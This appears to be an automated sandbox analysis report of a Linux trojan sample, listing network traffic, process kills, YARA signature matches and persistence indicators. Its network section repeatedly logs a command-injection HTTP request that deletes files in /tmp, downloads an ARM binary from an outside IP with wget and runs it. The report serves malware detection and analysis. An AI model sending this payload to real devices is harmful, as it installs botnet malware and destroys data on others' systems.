Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: unknown HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35442 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36684 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36688 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36690 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36694 version: TLS 1.2

System Summary:

barindex
Sample tries to kill multiple processes (SIGKILL)
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5286, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 491, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 658, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 720, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 721, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 759, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 761, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 772, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 774, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 777, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 785, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 793, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1334, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1335, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1344, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1872, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1886, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 2048, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5041, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5179, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5180, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5282, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5290, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5294, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5321, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5372, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5386, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5459, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5461, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5566, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5567, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5571, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5575, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5653, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5659, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5668, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5669, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5671, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5674, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5734, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5740, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5746, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5750, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5757, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5763, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5843, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5849, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5850, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5851, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5852, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5854, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5857, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5917, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5924, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5925, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5947, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5948, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5956, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5961, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) SIGKILL sent: pid: 936, result: successful Jump to behavior
Yara signature match
Source: nSg5RM0w0d, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5281.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5294.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5281.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5278.1.000000001aa4a697.0000000013aff119.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5289.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5286.1.000000001aa4a697.0000000013aff119.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5290.1.000000001aa4a697.0000000013aff119.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5278.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5282.1.000000001aa4a697.0000000013aff119.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5282.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5290.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5294.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5281.1.000000001aa4a697.0000000013aff119.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5286.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5294.1.000000001aa4a697.0000000013aff119.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5282.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5289.1.000000001aa4a697.0000000013aff119.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5290.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5289.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5286.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Sample tries to kill a process (SIGKILL)
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5286, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 491, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 658, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 720, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 721, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 759, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 761, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 772, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 774, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 777, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 785, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 793, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1334, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1335, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1344, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1872, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1886, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 2048, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5041, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5179, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5180, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5282, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5290, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5294, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5321, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5372, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5386, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5459, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5461, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5566, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5567, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5571, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5575, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5653, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5659, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5668, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5669, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5671, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5674, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5734, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5740, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5746, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5750, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5757, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5763, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5843, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5849, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5850, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5851, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5852, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5854, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5857, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5917, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5924, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5925, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5947, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5948, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5956, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5961, result: successful Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) SIGKILL sent: pid: 936, result: successful Jump to behavior
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal100.spre.troj.lin@0/184@16/0

Persistence and Installation Behavior:

barindex
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /usr/bin/dbus-daemon (PID: 5372) File: /proc/5372/mounts Jump to behavior
Source: /usr/bin/dbus-daemon (PID: 5527) File: /proc/5527/mounts Jump to behavior
Source: /bin/fusermount (PID: 5544) File: /proc/5544/mounts Jump to behavior
Source: /usr/bin/dbus-daemon (PID: 5571) File: /proc/5571/mounts Jump to behavior
Source: /usr/bin/dbus-daemon (PID: 5671) File: /proc/5671/mounts Jump to behavior
Source: /usr/bin/dbus-daemon (PID: 5757) File: /proc/5757/mounts
Source: /usr/bin/dbus-daemon (PID: 5854) File: /proc/5854/mounts
Source: /usr/bin/dbus-daemon (PID: 5947) File: /proc/5947/mounts
Source: /usr/bin/dbus-daemon (PID: 5956) File: /proc/5956/mounts
Source: /usr/bin/dbus-daemon (PID: 6046) File: /proc/6046/mounts
Source: /usr/bin/dbus-daemon (PID: 6110) File: /proc/6110/mounts
Executes the "kill" or "pkill" command typically used to terminate processes
Source: /usr/share/gdm/generate-config (PID: 5492) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service Jump to behavior
Source: /usr/share/gdm/generate-config (PID: 5661) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service Jump to behavior
Source: /usr/share/gdm/generate-config (PID: 5842) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
Source: /usr/share/gdm/generate-config (PID: 6019) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
Executes the "grep" command used to find patterns in files or piped streams
